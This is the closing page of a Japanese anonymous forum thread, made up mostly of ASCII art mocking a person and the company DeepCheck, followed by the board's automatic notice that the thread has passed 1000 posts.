ノ \三三ト、 /--,, れ / ,,_''- ,,_ ̄i =--/ ノ ノ レ >''' ̄\ ''- ,, | ,,r--,,,_ ノ ┃'- ├t弋ァ }//-丶, ! \ _ / 丶-< { うヽ } ,,, ''' 'T (赤っ恥) ト、| r─'( __ } ''-イ  ̄ヽ ''ー'' \ | \__ /''T ,/ "T-、 \_ , (幻 想) -r 丶 ト-=''''-'' }浦 ̄--'''' (無 能) ノ ,. ヘ jヽ, }\ ヽ 本 \/| ↑ /\ \ 勝 | ( ↑ / \ / 久 | ) ( / \  ̄ ̄ ̄ ̄ ̄ ( ) /_ \ ) ( ウラモティチルドレン  ̄ | 信 残 引| ̄ ノ⌒ ̄⌒γ⌒ ̄⌒ゝ / / | 用 り 退| ノ DeepCheck ゝ / / | と 少 の| 丿 ゞ _/ ∠ | 信 な 義| 丿/|/|/|/|\|\|\|\|\ゝ .\ / | 頼 い 務| │ V ――| を 資 、|――――――――――┼――――――――――――――――― / 失 金 背ヽ 巛巛巛巛巛巛巛巛 人巛巛巛巛巛巛巛巛巛巛エクスファの総力 う と 水 毛 の 髪 陣
1000 :
名無しさん@お腹いっぱい。 :2005/12/10(土) 23:49:15
___ | | |C D | |h e | |e e | ,,,. |c p | ,'"';, 、''゙゙;、). |k | 、''゙゙;、),、 ゙''!リ'' i二二二二!゙''l!リ'''゙ ‖ `i二二二!´ ‖ 昌 |: ̄ ̄ ̄ ̄:| 昌 | ̄:|_|;;;l"二二゙゙l;;|_| ̄:| | :|::::::| |;;;;;;;;;;| |::::| :| | :|::::::|┌─┐|::::| :| ./゙゙└‐┴ ┴l,,,,,,,,,,l┴┴‐┘゙゙゙゙\ | ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄|  ̄|三|三三|三三三三|三三|三| ̄ | |::: |: : : : |:: | | | |::: |: : : : |:: | | /_|::: |: : : :.|:: :|_ヽ _|___|;;;;;;;;;;|,;,;,,,,,,,,,,,,,,,;,;,|;;;;;;;;;;|___|_ l;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;l
1001 :
1001 :
Over 1000 Thread このスレッドは1000を超えました。 もう書けないので、新しいスレッドを立ててくださいです。。。